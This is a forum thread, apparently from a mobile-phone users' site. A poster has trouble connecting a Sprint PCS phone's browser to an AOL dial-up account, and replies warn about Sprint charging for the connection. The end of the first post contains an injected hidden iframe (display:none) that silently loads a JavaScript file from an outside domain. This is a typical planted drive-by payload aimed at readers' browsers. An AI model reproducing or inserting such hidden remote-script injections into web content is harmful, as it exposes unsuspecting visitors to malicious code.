+ Reply to Thread

ISP set up problem (non SprintPCS)

Read the FAQ post re: setting up an ISP in Network prefs. Unfortunately, I'm getting an OX1233 authentication error when I try to sign on. Could it be my script:
    Send User ID
    Send Password
    End
    the ISP I'm attempting to use is AOL (my other two are high speed network w/o dial up).
    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

you say no pcs related, but what isp are you using? also, what OS on the pc?

are you using the i300 to connect to the net on the pc?

you may have your username wrong.. recheck those settings

AOL is ISP

Actually, I did mention this in my post. However, I'm not trying to connect via PC, just merely trying to connect via Blazer browser and my AOL ISP account without running up Sprint Web bill to retreive my email when I'm out. I can do this via Yahoo through Sprint Web, but can't seem to get connected w/ my ISP.

Administrator

Arrow

im still unclear in what your asking, perhaps someone else can help me see the light...

but if you are using a sprint pcs phone to connect to your aol isp, you are still going thru sprint to do that. i just need to make that clear so we are on the same page.

its possible you may not be able to use aol via sprint. some people have had some other issues like this.

for example, i cant use my MSN dialup on my phone.. wont let me in.

why do you need to hook up to your isp? just to retrieve mail?

don't do it

Sprint will charge you for Vision access even if you don;t use it. I used Earthlink adn my cell to dial it up and they charged me for every minute I was on Earthlink. Quite a bit. And they also do not understand the concept of bandwidth and how I cannot possibly be using their bandwidth while I am using Earthlink's bandwidth. It is a big headache and if I were you I would just get another service or stick with their service.